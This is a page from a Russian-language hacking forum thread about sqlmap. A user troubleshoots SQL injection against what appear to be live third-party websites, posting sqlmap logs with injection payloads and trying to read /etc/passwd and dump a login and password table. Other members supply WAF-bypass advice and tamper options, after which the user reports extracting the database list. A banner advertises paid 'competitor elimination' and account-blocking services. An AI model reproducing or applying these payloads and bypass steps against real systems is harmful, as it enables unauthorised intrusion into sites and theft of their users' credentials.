Вопросы по SQLMap

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 71 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

13.07.2018, 02:18

mardoksp

Новичок

Регистрация: 08.04.2007

Сообщений: 7

С нами:
10048560

Репутация: 0

разобрался с этим сайтом

Теперь вопрос про другой сайт. Нашел дыру (на битриксе).

Но не могу прочитать файлы, т.е. как обычно делаю --file-read='/etc/passwd', но выдает ошибку

Похожа ошибка была на другом сайте, она появлялась тогда, когда файл отсутствовал по указанному пути

.SpoilerTarget" type="button">Spoiler: Log

Код:

[17:30:10] [INFO] resuming back-end DBMS 'mysql'
[17:30:10] [INFO] testing connection to the target URL
[17:30:12] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:30:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:30:14] [INFO] fingerprinting the back-end DBMS operating system
[17:30:14] [INFO] the back-end DBMS operating system is Linux
[17:30:14] [INFO] fetching file: '/etc/passwd'
[17:30:14] [INFO] resumed:
[17:30:14] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[17:30:21] [INFO] retrieved:
[17:30:21] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:[*] /root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)

[17:30:21] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

404 (Not Found) - 1 times ошибка выдается, скорее всего, по причине того, что при открытии страницы с sql-inject он отдает json но с HTTP CODE = 404

Теперь остается узнать какой параметр добавить, чтобы не было

Цитата:

Сообщение от None

[WARNING] there was a problem decoding value ' ' from expected hexadecimal form[*] /root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)

Ладно /etc/passwd может быть закрыт, но файлы битрикса хоть какие-то уже должен прочитать.

И в продолжении, в чем может быть причина, если это не отрабатывает

Код:

sqlmap -u site/inject.php?ID=1 -D database -T table_login -C LOGIN,PASSWORD --dump

И выдает ошибку

Цитата:

Сообщение от None

[WARNING] unable to retrieve the entries of columns 'LOGIN, PASSWORD' for table 'table_login' in database

А вот это отрабатывает

Цитата:

Сообщение от None

sqlmap -u site/inject.php?ID=1 --sql-query="select login from table_login where id=1"

.SpoilerTarget" type="button">Spoiler: Log2

Код:

[17:49:02] [INFO] resuming back-end DBMS 'mysql'
[17:49:02] [INFO] testing connection to the target URL
[17:49:04] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:49:06] [INFO] fetching SQL SELECT statement query output: 'select login from table_login where id=1'
[17:49:08] [INFO] used SQL query returns 1 entries
[17:49:09] [INFO] retrieved: admin
select login from table_login where id=1:    'admin'
[17:49:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

Кодировка db - utf8

𝕏 Twitter Reddit Telegram Копировать ссылку

14.07.2018, 12:05

mardoksp

Новичок

Регистрация: 08.04.2007

Сообщений: 7

С нами:
10048560

Репутация: 0

Найдена уязвимость

Код:

Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/product&path=1&product_id=1 AND 7670=7670
    Vector: AND [INFERENCE]

При попытке получить список баз данных вываливает ошибку

.SpoilerTarget" type="button">Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.6.33, Nginx

back-end DBMS: MySQL 5 (MariaDB fork)

[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases

[03:50:18] [DEBUG] resuming configuration option 'string' (3D)

[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51

sqlmap got a 301 redirect to 'http://site/index.php?route=product/...1&product_id=1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n

[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases

[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9

[03:50:25] [INFO] retrieved:

[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds

[03:50:25] [ERROR] unable to retrieve the number of databases

[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database

[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1

[03:50:30] [INFO] retrieved:

[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds

[03:50:30] [CRITICAL] unable to retrieve the database names

Как дальше раскрутить? Спасибо

17.07.2018, 11:15

grimnir

Познавший АНТИЧАТ

Регистрация: 23.04.2012

Сообщений: 1,109

С нами:
7396886

Репутация: 231

Цитата:

Сообщение от mardoksp

↑
Найдена уязвимость

Код:

Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/product&path=1&product_id=1 AND 7670=7670
    Vector: AND [INFERENCE]

При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names

[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/...1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48

[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database

[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64

[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32

[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо

1)нет прав

2)waf ответ 301 может или истекла сессия или поменялся ответ от сервера проверьте сайт не http может указывать нужно ,а https , после пробуйте --hex --no-cast ,тамперы и обход waf https://github.com/Ekultek/WhatWaf

3)поискать другую ошибку,где нет редиректа

17.07.2018, 21:01

mardoksp

Новичок

Регистрация: 08.04.2007

Сообщений: 7

С нами:
10048560

Репутация: 0

Цитата:

Сообщение от grimnir

↑
обход waf
https://github.com/Ekultek/WhatWaf

пробую проверить, появляется ошибка

Не подскажите, как решить?

18.07.2018, 04:54

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

С нами:
5745206

Репутация: 1

Цитата:

Сообщение от mardoksp

↑
пробую проверить, появляется ошибка
Не подскажите, как решить?

Ты кажись насувал дахуя тамперов

кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)

18.07.2018, 14:49

grimnir

Познавший АНТИЧАТ

Регистрация: 23.04.2012

Сообщений: 1,109

С нами:
7396886

Репутация: 231

Цитата:

Сообщение от mardoksp

↑
пробую проверить, появляется ошибка
Не подскажите, как решить?

вроде написано что слишком много редиректов.

18.07.2018, 16:39

mardoksp

Новичок

Регистрация: 08.04.2007

Сообщений: 7

С нами:
10048560

Репутация: 0

Цитата:

Сообщение от Sensoft

↑
Ты кажись насувал дахуя тамперов
кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)

Цитата:

Сообщение от grimnir

↑
вроде написано что слишком много редиректов.

так я запустил по инструкции на гите, чтобы определило waf и указало какой тампер надо использовать.

И спустя стольких редиректов получаю ошибку. Я тампер в sqlmap вообще не использовал, думал WhatWaf подскажет что использовать

18.07.2018, 17:34

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

С нами:
8814194

Репутация: 0

Цитата:

Сообщение от mardoksp

↑
Найдена уязвимость

Код:

Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/product&path=1&product_id=1 AND 7670=7670
    Vector: AND [INFERENCE]

Код:

--tamper=greatest или --tamper=between или --tamper=least

Попробуйте один из этих. Судя по логам проблема в символе >, возможно так же и в [B]

18.07.2018, 18:36

mardoksp

Новичок

Регистрация: 08.04.2007

Сообщений: 7

С нами:
10048560

Репутация: 0

[QUOTE="cat1vo"]
↑

Код:

--tamper=greatest или --tamper=between или --tamper=least

Попробуйте один из этих. Судя по логам проблема в символе
>
, возможно так же и в

, возможно так же и в
[B] обалдеть, сразу получил список баз

#10

18.07.2018, 18:50

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами:
5797046

Репутация: 40

Цитата:

Сообщение от mardoksp

↑
--tamper=between
помог, но как вы узнали по логам? как обучиться такому кунг-фу?
обалдеть, сразу получил список баз

Практика и труд

Страница 71 из 115

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules